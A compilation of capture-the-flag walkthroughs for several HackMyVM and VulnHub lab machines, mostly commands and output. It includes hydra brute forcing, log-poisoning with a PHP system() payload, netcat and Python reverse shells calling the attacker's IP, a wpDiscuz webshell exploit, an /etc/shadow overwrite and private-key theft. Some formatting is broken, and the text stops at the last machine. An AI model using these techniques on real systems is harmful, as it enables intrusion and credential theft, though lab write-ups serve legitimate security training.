HackMyVm Noob Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Noob

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for secret.vinci.hmv (192.168.56.100)
 Host is up (0.0010s latency).
 Not shown: 65533 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
 |   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
 |_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
 65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
 |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check 65530 http.

 ~ curl http://192.168.56.100:65530
 404 page not found

Try /index.

 ~ curl http://192.168.56.100:65530/index
 Hi, You are close!

Scan dirs. Because too many fake response, we omit file extensions.

```bash
~ gobuster dir -u http://192.168.56.100:65530 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,403,404,500 --wildcard -o 65530.log
...

/index (Status: 200) [Size: 19]
/http%3A%2F%2Fwww (Status: 301) [Size: 45] [--> /http:/www]
/http%3A%2F%2Fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]
/http%3A%2F%2Fblogs (Status: 301) [Size: 47] [--> /http:/blogs]
/http%3A%2F%2Fblog (Status: 301) [Size: 46] [--> /http:/blog]
/**http%3A%2F%2Fwww (Status: 301) [Size: 51] [--> /%2A%2Ahttp:/www]
/http%3A%2F%2Fcommunity (Status: 301) [Size: 51] [--> /http:/community]
/http%3A%2F%2Fradar (Status: 301) [Size: 47] [--> /http:/radar]
/http%3A%2F%2Fjeremiahgrossman (Status: 301) [Size: 58] [--> /http:/jeremiahgrossman]
/http%3A%2F%2Fweblog (Status: 301) [Size: 48] [--> /http:/weblog]
/http%3A%2F%2Fswik (Status: 301) [Size: 46] [--> /http:/swik]
/nt4share (Status: 301) [Size: 45] [--> /nt4share/]

Notice the last /nt4sare. Check it.

 ```bash
~ curl http://192.168.56.100:65530/nt4share/
 <pre>
 <a href=".Xauthority">.Xauthority</a>
 <a href=".bash_history">.bash_history</a>
 <a href=".bash_logout">.bash_logout</a>
 <a href=".bashrc">.bashrc</a>
 <a href=".profile">.profile</a>
 <a href=".ssh/">.ssh/</a>
 <a href="linpeas.sh">linpeas.sh</a>
 <a href="pspy64">pspy64</a>
 </pre>

It's a user's home folder. From .bash_history, we get an user name "adela".

~ curl ht```bash
tp://192.168.56.100:65530/nt4share/.bash_history
...
ls -la /opt
find / -user adela 2>/dev/null

 ...

From /.ssh, we download id_rsa, and login ssh as user adela.

```bash
 ~ chmod 600 id_rsa
 ~ ssh adela@192.168.56.100 -i id_rsa
 ...
 adela@noob:~$ id
 uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plu
 gdev),109(netdev)

The last step is tricky. Enum a lot but still can not find the way to root.

Create a symbolic link to /root/.ssh/id_rsa, then read it through http.

adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela/
 ...
 ~ curl http://192.168.56.100:65530/nt4share/id_rsa                    
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 ...
 ZxNBqOXEOeZrCUy6ujhX4HeLih7BElkYwZEKvVbJti/I0RsdcbYGWlAPPBvi/8jZnQ7xaT
 T7Qx+xDGFV1hJakGHwAAAAlyb290QG5vb2I=
 -----END OPENSSH PRIVATE KEY-----

HackMyVm Hundred Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hundred

Scan open ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rwxrwxrwx    1 0        0             435 Aug 02 06:19 id_rsa [NSE: writeable]
 | -rwxrwxrwx    1 1000     1000         1679 Aug 02 06:11 id_rsa.pem [NSE: writeable]
 | -rwxrwxrwx    1 1000     1000          451 Aug 02 06:11 id_rsa.pub [NSE: writeable]
 |_-rwxrwxrwx    1 0        0             187 Aug 02 06:27 users.txt [NSE: writeable]
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to ::ffff:192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 1
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)
 |   256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)
 |_  256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Login in ftp anonymous, download all 4 files and check each one.

id_rsa is a fake key. users.txt has a name list. id_rsa.pem looks like a good rsa key.

Scan port 80, only found index.html. Check source code, there is a hint: key. And there may be a secret dir.

```bash
~ curl http://192.168.56.100/index.html
<style>
.center {
display: block;
margin-left: auto;
margin-right: auto;
key: h4ckb1tu5.enc;
width: 50%;
}
</style>

<img src="logo.jpg" class="center">
<h1>Thank you ALL!</h1>
<h1>100 f*cking VMs!!</h1>

<!-- l4nr3n, nice dir.-->

Download h4ckb1tu5.enc. Google the way to decrypt enc file. Get the dir name.

```bash
 ~ openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key.bin  
 ~ cat key.bin
 /softyhackb4el7dshelldredd

Scan the dir with common.txt, get id_rsa.

 ~ gobuster dir -u http://192.168.56.100/softyhackb4el7dshelldredd -t 50  -w /usr/share/dirb/wordlists/common.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /id_rsa               (Status: 200) [Size: 1876]
 /index.html           (Status: 200) [Size: 26]  
 /index.html           (Status: 200) [Size: 26]

Try to login ssh with the username in users.txt downloaded from ftp, in fact, the really username is hvm. But we still need the pass of the key file.

 ~ ssh noname@192.168.56.100 -i id_rsa    
 noname@192.168.56.100's password:

 ~ ssh hmv@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':

At root folder, we can get a logo.jpg, let's see if something is hidden in it.

 ~ stegseek --crack logo.jpg users.txt
 StegSeek version 0.5
 Progress: 0.00% (0 bytes)          

 [i] --> Found passphrase: "cromiphi"
 [i] Original filename: "toyou.txt"
 [i] Extracting to "logo.jpg.out"

 ~ cat logo.jpg.out                                                                                      
 d4t4s3c#1

Now we can login ssh as hmv.

 ~ ssh hmv@192.168.56.100 -i id_rsa                                                                                                                                                             ssh-0 | 130 [19:12:34]
 Enter passphrase for key 'id_rsa':
 Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Aug  2 06:43:27 2021 from 192.168.1.51
 hmv@hundred:~$ id
 uid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Found /etc/shadow is writable.

hmv@hundred:/$ find / -writable -not -path "/proc*" 2>/dev/null
 ...
 /var/www/html/softyhackb4el7dshelldredd/id_rsa
 /etc/shadow
 ...

Create a password hash with word "mypass", and overwrite /etc/shadow. Then we can be root.

 hmv@hundred:/$ openssl passwd mypass
 J9ZxI.ncuCgxs
 hmv@hundred:/$ echo 'root:J9ZxI.ncuCgxs:18656:0:99999:7:::' > /etc/shadow
 hmv@hundred:/$ su root
 Password:
 root@hundred:/# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 hundred
 root@hundred:/# 

HackMyVm Nowords Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Nowords

Below is main steps.

Nmap scan ports, scan port 80, found hints at index.html.

 ~ curl http://192.168.56.100/index.html        
 Hint inside.

 <!-- [usernames and passwords are lowercase] -->

Download robots.txt, it's actually an PNG file, with some strings in it.

[image-20210707134241221.png]

OCR the strings online, make a dic, and scan port 80 again, found only 1 valid files. Download it, and it's actually a JPG file with some strings.

[image-20210707134856042.png]

OCR again, lower the first char of each word, make a dic. Then brute force ftp.

~ hydra -L pass2.txt -P pass2.txt 192.168.56.100 -t 64 ftp -f                                                                                                                                   fish-0 | 0 [12:54:58]
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 12:55:22
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 64 tasks per 1 server, overall 64 tasks, 5776 login tries (l:76/p:76), ~91 tries per task
 [DATA] attacking ftp://192.168.56.100:21/
 [21][ftp] host: 192.168.56.100   login: sophie   password: natalia
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 12:56:28

Through the ftp, we can browse the whole machine. In /home/sophie, found command.jpg and log.txt.

In /home/me, found doit.py.

 ~ cat doit.py                                                                        fish-0 | 0 [13:50:38]
 #!/usr/bin/python3
 # coding: utf-8

 import pytesseract
 import os
 try:
     import Image, ImageOps, ImageEnhance, imread
 except ImportError:
     from PIL import Image, ImageOps, ImageEnhance

 def solve_captcha(path):
     captcha = pytesseract.image_to_string(Image.open(path))
     return captcha

 if __name__ == '__main__':
     text = solve_captcha("/home/sophie/command.jpg")
     a = text.split("\n")
     f = open("/home/sophie/log.txt","w")
     f.write(" Executing: "+text)
     f.close()
     os.system(a[0])

The script means, we need to put and bash command in command.jpg, then cron job will do OCR and run the command.

We put shell code in command.jpg, then upload through ftp.

[image-20210707135227171.png]

Wait a minute, we will get reverse shell.

 ~ nc -nlvp 1234                                                                                                                                                                                 fish-0 | 0 [13:09:25]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49930.
 bash: cannot set terminal process group (136083): Inappropriate ioctl for device
 bash: no job control in this shell
 sophie@nowords:~$

The root step is use the Ubuntu Polkit Vulnerability.

Check the POC here.

https://github.com/Almorabea/Polkit-exploit

[image-20210707134038343.png]

HackMyVm Lisa Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Lisa

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 17:f7:58:02:e9:00:69:04:c5:88:ba:65:5a:11:dc:58 (RSA)
 |   256 4c:32:c5:92:8c:d9:06:a4:a9:89:fa:99:92:bb:66:7f (ECDSA)
 |_  256 d1:36:d3:da:2b:7f:d7:03:5f:fc:1b:94:aa:7e:04:af (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found nothing useful. Check index.html, notice the hint about domain name vinci.hmv.

 ~ curl http://192.168.56.100/index.html |tail -n 15                                  
           <p>
                 Please report bugs specific to modules (such as PHP and others)
                 to respective packages, not to the web server itself. contact: vinci.hmv
           </p>
         </div>

Add vinci.hmv to /etc/hosts, scan port 80 again, still found nothing useful.

Use gobuster to enum vhosts.

 ~ gobuster vhost -u vinci.hmv  -w  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -v |grep -v 10719
 ===============================================================
 ...
 Missed: secret.vinci.hmv (Status: 200) [Size: 80]
 ===============================================================
 2021/07/04 15:35:24 Finished
 ===============================================================

Add secret.vinci.hmv to /etc/hosts, scan files again, found file.php.

 ~ gobuster dir -u http://secret.vinci.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medi
 um.txt  -x .html,.php,.txt,.zip,.bak,.php.bak -b 401,403,404,500 --wildcard   -o 80_secret.log
 ===============================================================
 /index.html           (Status: 200) [Size: 80]
 /file.php             (Status: 200) [Size: 0]

Wfuzz to get the param name.

 ~ wfuzz -u 'http://secret.vinci.hmv/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000004959:   200        26 L     42 W       1441 Ch     "command"  

Looks like a LFI.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/etc/passwd'                        fish-0 | 0 [15:55:59]
 root:x:0:0:root:/root:/bin/bash
 ...
 leonardo:x:1000:1000:leonardo,,,:/home/leonardo:/bin/bash
 ...

See what files we can read.

~ wfuzz -u 'http://secret.vinci.hmv/file.php?command=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hh 0        
 ********************************************************
 * Wfuzz 3.1.0 - The Web Fuzzer                         *
 ********************************************************      
 ...
 000000188:   200        0 L      1 W        32032 Ch    "/var/log/faillog"
 000000173:   200        1364 L   16410 W    130186 Ch   "/var/log/auth.log"
 000000181:   200        2993 L   17879 W    202004 Ch   "/var/log/dpkg.log"
 000000220:   200        5 L      85 W       74873 Ch    "/var/log/wtmp"
 000000224:   200        0 L      1 W        1152 Ch     "/var/run/utmp"
 000000199:   200        0 L      1 W        292292 Ch   "/var/log/lastlog"

Because auth.log will save the username of ssh login. So we use a shell code as the ssh name.

 ~ ssh '<?php system($_GET[c]);?>'@192.168.56.100    
 <?php system($_GET[c]);?>@192.168.56.100's password:
 Permission denied, please try again.                

Now we can run bash command.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=id'
 ...
 Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups
 =33(www-data)
  from 192.168.56.150 port 33632 ssh2
 ...

Get reverse shell.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=nc%20192.168.56.150%201234%20-e%20/bi
 n/bash'
 =====================================================================
 ~ nc -nlvp 1234                                        
 Ncat: Version 7.91 ( https://nmap.org/ncat )          
 Ncat: Listening on :::1234                            
 Ncat: Listening on 0.0.0.0:1234                        
 Ncat: Connection from 192.168.56.100.                  
 Ncat: Connection from 192.168.56.100:52344.            
 id                                                    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)  

There is only one user leonardo, and /opt/cron.sh belongs to him.

```
www-data@Lisa:/home/leonardo$ find / -user leonardo 2>/dev/null
find / -user leonardo 2>/dev/null
/home/leonardo
/home/leonardo/.bash_logout
/home/leonardo/.profile
/home/leonardo/.bashrc
/home/leonardo/.local
/home/leonardo/.local/share
/home/leonardo/.selected_editor
/home/leonardo/user.txt
/opt/cron.sh

Check the source code of cron.sh. 

www-data@Lisa:/opt$ cat cron.sh
cat cron.sh

!/bin/bash

domain='shelly.lisa.hmv'

function check(){

     timeout 1 bash -c "ping -c 1 $domain" > /dev/null 2>&1
 if [ "$(echo $?)" == "0" ]; then
     nohup nc -e /bin/sh $domain 65000
     exit 0
 elseifconfig
     exit 1
 fi                                                        

}

Add the ip of attacker's machine to /etc/hosts.

www-data@Lisa:/opt$ ls -la /etc/hosts
ls -la /etc/hosts
-rw----rw- 1 root root 457 Jun 14 17:55 /etc/hosts
www-data@Lisa:/opt$ echo '192.168.56.150 shelly.lisa.hmv' > /etc/hosts

Wait a minute, we get reverse shell of user leonardo.

 ```
~ nc -nlvp 65000                                                                   curl-0 | 130 [16:15:34]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::65000
 Ncat: Listening on 0.0.0.0:65000
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49036.
 id
 uid=1000(leonardo) gid=1000(leonardo) grupos=1000(leonardo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Upload id_rsa.pub to /home/leonardo/.ssh/authorized_keys and chmod 600. Then we get ssh access.

 ~ ssh leonardo@192.168.56.100                                                      fish-0 | 130 [16:20:35]
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux Lisa 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Jun 14 13:01:44 2021 from 192.168.1.83
 /usr/bin/xauth:  file /home/leonardo/.Xauthority does not exist
 leonardo@Lisa:~$

Check sudo -l.

leonardo@Lisa:~$ sudo -l
 sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
 Matching Defaults entries for leonardo on Lisa:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User leonardo may run the following commands on Lisa:
     (root) NOPASSWD: /usr/bin/efax

Use efax to read shadow file.

```
leonardo@Lisa:~$ sudo efax -d /etc/shadow
sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 10:17 compiled Dec 15 2016 12:12:26
efax: 10:17 opened /etc/shadow
efax: 10:17 Error: tcgetattr on fd=3 failed: Función ioctl no apropiada para el dispositivo
efax: 10:17 Warning: unexpected response "root:$6$RnHOYwKvoinsNFhF$zdIHAyW0TtHpAfnUc2p2bEPaHTuu/vdRFcTOSzOokSflUo/YoqDU3NzSCtm9VRELG53fGVrfen1PNBKGt6gix0:18792:0:99999:7:::"
efax: 10:17 Warning: unexpected response "daemon::18791:0:99999:7:::"
efax: 10:17 Warning: unexpected response "bin::18791:0:99999:7:::"
...

Use john to crack the password hash of root.

~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveme (root)
1g 0:00:00:00 DONE (2021-07-05 10:28) 6.666g/s 1706p/s 1706c/s 1706C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Get root at last.

leonardo@Lisa:~$ su root
Contraseña:
root@Lisa:~# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
Lisa

HackMyVm Beloved Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Beloved

Scan for open ports.

 ~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-generator: WordPress 5.7.2
 | http-robots.txt: 1 disallowed entry
 |_/wp-admin/
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Beloved – Just another WordPress site
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 is wordpress. Add beloved to /etc/hosts. Search for vulnerabilities.

 ~ wpscan --url http://beloved -e ap --no-banner --api-token yourkey --force --plugins-detection aggressive |tee wpscan.log
 [+] wpdiscuz
  | Location: http://beloved/wp-content/plugins/wpdiscuz/
  | Last Updated: 2021-05-15T13:40:00.000Z
  | Readme: http://beloved/wp-content/plugins/wpdiscuz/readme.txt
  | [!] The version is out of date, the latest version is 7.2.2
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://beloved/wp-content/plugins/wpdiscuz/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
  |     Fixed in: 7.0.5
  |     References:
  |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
  |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
  |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
  |
  | Version: 7.0.4 (80% confidence)

Search exp for wpdiscuz.

~ searchsploit wpdiscuz                                                              fish-0 | 0 [21:19:28]
 ------------------------------------------------------------------------ ---------------------------------
  Exploit Title                                                          |  Path
 ------------------------------------------------------------------------ ---------------------------------
 WordPress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticate | php/webapps/49962.sh
 WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticate | php/webapps/49967.py
 WordPress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload | php/webapps/49401.rb
 ------------------------------------------------------------------------ --------------------------------

Run the POC code.

```
~ python3 49967.py -u http://beloved -p /2021/06/09/hello-world/ bash-0 | 0 [12:17:55]

[-] WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox

[+] Response length:[51680] | code:[200]
[!] Got wmuSecurity value: 9c794f21e7
[!] Got wmuSecurity value: 1

[+] Generating random name for Webshell...
[!] Generated webshell name: bhgnpbentfvkgzh

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php";

Visit the webshell, listen to port 1234, we can get a reverseshell.

http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

Check sudo -l.

 ```
www-data@beloved:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on beloved:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on beloved:
     (beloved) NOPASSWD: /usr/local/bin/nokogiri

The nokogiri will activate an ruby shell, but the trick is to add an extra parameter for log file.

www-data@beloved:/$ touch /tmp/log.txt                    
 touch /tmp/log.txt
 www-data@beloved:/$ sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 Your document is stored in @doc...
 Switch to inspect mode.
 system 'id'
 system 'id'
 uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
 system '/bin/bash'

Now we are beloved. We upload id_rsa.pub, change to authorzied_keys, to get ssh access.

```
cd .ssh
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-07-02 06:44:36-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
...
chmod 600 authorized_keys

Ssh login as beloved.

~ ssh beloved@192.168.56.100
...
beloved@beloved:~$ id
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)

Check pspy64.

2021/07/02 06:47:01 CMD: UID=0 PID=1878 | /usr/sbin/CRON -f
2021/07/02 06:47:01 CMD: UID=0 PID=1879 | /bin/sh -c cd /opt && chown root:root *

In /opt, there is only a id_rsa. Maybe it's private key for user root. We need to make it readable for user beloved.

 ```
beloved@beloved:/$ ls -la opt
 total 12
 drwxrwx---  2 root    beloved 4096 Jul  2 06:52 .
 drwxr-xr-x 18 root    root    4096 May 19 10:09 ..
 -rw-------  1 root    root    1823 Jun 27 16:41 id_rsa

Use the chown wildcard vulnerability. See the article here.

beloved@beloved:/opt$ touch ref
 beloved@beloved:/opt$ touch -- --reference=ref

Wait a minute, the id_rsa has been changed to user beloved, which is the owner of file ref.

```
beloved@beloved:/opt$ ls -la
total 12
drwxrwx--- 2 root beloved 4096 Jul 2 06:59 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
-rw------- 1 beloved beloved 1823 Jun 27 16:41 id_rsa
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:58 ref
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:59 '--reference=ref'

Read id_rsa, then we can login ssh as root.

~ ssh root@192.168.56.100 -i key ...
root@beloved:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
beloved

Vulnhub HackathonCTF: 2 Walkthrough

https://www.vulnhub.com/entry/hackathonctf-2,714/

Difficulty: Easy

Scan ports.

 ~ nmap -sV -sC -p- 192.168.33.140  -oN ports.log            
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 17:17 CST
 Nmap scan report for bogon (192.168.33.140)              
 PORT     STATE SERVICE VERSION
 21/tcp   open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 |_-rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 ...
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 1 disallowed entry                                                 ...
 7223/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
 ...

Get a dic file from ftp.

 ~ ftp 192.168.33.140                                            
 Connected to 192.168.33.140.                                    
 220 (vsFTPd 3.0.3)                                              
 Name (192.168.33.140:kali): anonymous                            
 331 Please specify the password.                                
 Password:                                                        
 230 Login successful.                                            
 Remote system type is UNIX.                                      
 Using binary mode to transfer files.                            
 ftp> ls -la                                                      
 200 PORT command successful. Consider using PASV.                
 150 Here comes the directory listing.                            
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 .        
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 ..      
 -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 -rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 226 Directory send OK.                                          
 ftp> get word.dir                                                
 local: word.dir remote: word.dir            

Scan folders and files of port 80.

~ gobuster dir -u http://192.168.33.140 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 1254]
 /robots.txt           (Status: 200) [Size: 70]
 /happy                (Status: 200) [Size: 110]          

Visit /happy, check source code, found username hackathonll.

```
~ curl http://192.168.33.140/happy
<html>
<title>happy</title>

<body><h1> Nothing is in here</h1></body>

<!-- username: hackathonll >

</html>

Brute force ssh with this username and the dic file.

~ hydra -l hackathonll -P word.dir 192.168.33.140 -s 7223 ssh -t64 -f
...
[DATA] attacking ssh://192.168.33.140:7223/
[7223][ssh] host: 192.168.33.140 login: hackathonll password: Ti@gO
[STATUS] attack finished for 192.168.33.140 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Ssh login, check sudo -l.

 ```
~ ssh hackathonll@192.168.33.140 -p 7223
 ...
 $ sudo -l
 Matching Defaults entries for hackathonll on hackathon:
     env_reset, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 User hackathonll may run the following commands on hackathon:
     (root) NOPASSWD: /usr/bin/vim

Sudo run vim, press ":", then input "!/bin/bash", and became root.

$ sudo vim                            

 root@hackathon:/home/hackathonll# id  
 uid=0(root) gid=0(root) groups=0(root)

Vulnhub Pylington: 1 Walkthrough

https://www.vulnhub.com/entry/pylington-1,684/

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                                      
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.5 (protocol 2.0)    
 80/tcp open  http    Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)

Scan port 80.

